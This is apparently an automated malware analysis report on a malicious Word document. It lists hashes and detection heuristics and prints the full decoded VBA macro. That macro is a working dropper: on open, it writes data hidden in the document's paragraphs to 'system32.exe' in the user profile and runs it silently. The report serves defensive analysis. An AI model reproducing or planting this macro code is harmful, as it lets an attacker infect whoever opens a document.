Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 79901e939e9d1167…

MALICIOUS

Office (OLE)

325.0 KB Created: 2013-04-02 13:03:00 Authoring application: Microsoft Office Word First seen: 2015-10-13
MD5: e055c933a68a79bed5c047d1d2527460 SHA-1: 6d1355ef85a0ba445c70da8cd3551b8fd9e6a4d8 SHA-256: 79901e939e9d1167fca3e6685e202fb276bb30cab5235fcf20f3f9e62bf0d1cb
234 Risk Score

Heuristics 10

  • ClamAV: Doc.Downloader.Generic-6698421-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Generic-6698421-0
  • VBA macros detected medium 6 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
        Tpwrd7 = Shell(Tpwrd10, vbHide)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Sub Workbook_Open()
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Sub Auto_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
        Tpwrd2 = Environ("USERPROFILE")
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1702 bytes
SHA-256: 2a5d11cbe2ed5a04b816d6a34f44af50805ba7db37ea0b9f28eb0b189dfa72b8
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"
Sub Auto_Open()
    Tpwrd12
End Sub
Sub Tpwrd12()
    Dim Tpwrd7 As Integer
    Dim Tpwrd1 As String
    Dim Tpwrd2 As String
    Dim Tpwrd3 As Integer
    Dim Tpwrd4 As Paragraph
    Dim Tpwrd8 As Integer
    Dim Tpwrd9 As Boolean
    Dim Tpwrd5 As Integer
    Dim Tpwrd11 As String
    Dim Tpwrd6 As Byte
    Dim Qdantnrtst As String
    Qdantnrtst = "Qdantnrtst"
    Tpwrd1 = "system32.exe"
    Tpwrd2 = Environ("USERPROFILE")
    ChDrive (Tpwrd2)
    ChDir (Tpwrd2)
    Tpwrd3 = FreeFile()
    Open Tpwrd1 For Binary As Tpwrd3
    For Each Tpwrd4 In ActiveDocument.Paragraphs
        DoEvents
            Tpwrd11 = Tpwrd4.Range.Text
        If (Tpwrd9 = True) Then
            Tpwrd8 = 1
            While (Tpwrd8 < Len(Tpwrd11))
                Tpwrd6 = Mid(Tpwrd11, Tpwrd8, 4)
                Put #Tpwrd3, , Tpwrd6
                Tpwrd8 = Tpwrd8 + 4
            Wend
        ElseIf (InStr(1, Tpwrd11, Qdantnrtst) > 0 And Len(Tpwrd11) > 0) Then
            Tpwrd9 = True
        End If
    Next
    Close #Tpwrd3
    Tpwrd13 (Tpwrd1)
End Sub
Sub Tpwrd13(Tpwrd10 As String)
    Dim Tpwrd7 As Integer
    Dim Tpwrd2 As String
    Tpwrd2 = Environ("USERPROFILE")
    ChDrive (Tpwrd2)
    ChDir (Tpwrd2)
    Tpwrd7 = Shell(Tpwrd10, vbHide)
End Sub
Sub AutoOpen()
    Auto_Open
End Sub
Sub Workbook_Open()
    Auto_Open
End Sub